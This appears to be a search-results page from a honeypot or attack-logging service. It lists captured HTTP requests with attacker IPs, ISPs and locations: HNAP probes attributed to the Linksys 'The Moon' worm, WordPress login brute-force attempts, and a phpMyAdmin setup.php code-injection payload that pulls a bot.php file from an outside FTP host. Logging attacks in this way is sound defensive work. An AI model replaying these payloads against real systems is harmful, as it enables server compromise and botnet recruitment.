This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 7423 results (743 pages)

Linksys "The Moon" Worm

[Attack info]
Attacker: 92.223.158.16
Dest. port: 80
Time: 13/06/2020 01:33:58
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS12874 Fastweb SpA
Location: Lombardy, Milan (zipcode 20144)
POST /HNAP1/ HTTP/1.0 Content-Length: 345 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2" connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Host: 139.63.155.85 referer: http://139.63.155.85/ authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/"> </GetRouterLanSettings2> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 92.223.158.16
Dest. port: 80
Time: 13/06/2020 01:33:58
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS12874 Fastweb SpA
Location: Lombardy, Milan (zipcode 20144)
POST /HNAP1/ HTTP/1.0 Content-Length: 331 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWanSettings" Host: 139.63.155.85 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://139.63.155.85/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWanSettings xmlns="http://purenetworks.com/HNAP1/"> </GetWanSettings> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 92.223.158.16
Dest. port: 80
Time: 13/06/2020 01:33:57
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS12874 Fastweb SpA
Location: Lombardy, Milan (zipcode 20144)
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady" Host: 139.63.155.85 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://139.63.155.85/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <IsDeviceReady xmlns="http://purenetworks.com/HNAP1/"> </IsDeviceReady> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 92.223.158.16
Dest. port: 80
Time: 13/06/2020 01:33:57
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS12874 Fastweb SpA
Location: Lombardy, Milan (zipcode 20144)
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios" Host: 139.63.155.85 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://139.63.155.85/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadios xmlns="http://purenetworks.com/HNAP1/"> </GetWLanRadios> </soap:Body> </soap:Envelope>

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

[Attack info]
Attacker: 95.110.227.41
Dest. port: 80
Time: 05/10/2019 22:05:43
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host41-227-110-95.serverdedicati.aruba.it
POST /phpMyAdmin/scripts/setup.php HTTP/1.1 Content-Length: 234 cookie2: $Version="1" Host: 72.99.250.246 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] connection: TE referer: http://72.99.250.246/phpMyAdmin/scripts/setup.php cookie: phpMyAdmin=2e43e013731e676c3502e227ca71d7da te: deflate,gzip;q=0.3 Content-Type: application/x-www-form-urlencoded action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

[Attack info]
Attacker: 95.110.227.41
Dest. port: 80
Time: 05/10/2019 20:13:47
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host41-227-110-95.serverdedicati.aruba.it
POST /phpMyAdmin/scripts/setup.php HTTP/1.1 Content-Length: 234 cookie2: $Version="1" Host: 4.142.9.230 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] connection: TE referer: http://4.142.9.230/phpMyAdmin/scripts/setup.php cookie: phpMyAdmin=2e43e013731e676c3502e227ca71d7da te: deflate,gzip;q=0.3 Content-Type: application/x-www-form-urlencoded action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D

Wordpress Login Bruteforcer

[Attack info]
Attacker: 81.208.42.172
Dest. port: 80
Time: 04/10/2019 10:59:58
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS12874 Fastweb SpA
Location: Lombardy, Milan (zipcode 20121)
POST /wp-login.php HTTP/1.1 Content-Length: 125 accept-encoding: gzip Host: host188-94-dynamic.56-82-r.retail.telecomitalia.it User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 connection: close Content-Type: application/x-www-form-urlencoded log=&pwd=123456&wp-submit=Log In&redirect_to=http://host188-94-dynamic.56-82-r.retail.telecomitalia.it/wp-admin/&testcookie=1

Wordpress Login Bruteforcer

[Attack info]
Attacker: 81.208.42.172
Dest. port: 80
Time: 04/10/2019 10:59:58
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS12874 Fastweb SpA
Location: Lombardy, Milan (zipcode 20121)
GET /wp-login.php HTTP/1.1 connection: close Host: host188-94-dynamic.56-82-r.retail.telecomitalia.it Content-Type: application/x-www-form-urlencoded accept-encoding: gzip User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0

Wordpress Login Bruteforcer

[Attack info]
Attacker: 164.132.100.13
Dest. port: 80
Time: 03/10/2019 18:53:54
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Grand Est, Strasbourg (zipcode 67000)
rDNS: 13.ip-164-132-100.eu
GET /wp-login.php HTTP/1.1 connection: close Host: host188-94-dynamic.56-82-r.retail.telecomitalia.it Content-Type: application/x-www-form-urlencoded accept-encoding: gzip User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0

Wordpress Login Bruteforcer

[Attack info]
Attacker: 164.132.100.13
Dest. port: 80
Time: 03/10/2019 18:53:54
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Grand Est, Strasbourg (zipcode 67000)
rDNS: 13.ip-164-132-100.eu
POST /wp-login.php HTTP/1.1 Content-Length: 128 accept-encoding: gzip Host: host188-94-dynamic.56-82-r.retail.telecomitalia.it User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 connection: close Content-Type: application/x-www-form-urlencoded log=&pwd=password1&wp-submit=Log In&redirect_to=http://host188-94-dynamic.56-82-r.retail.telecomitalia.it/wp-admin/&testcookie=1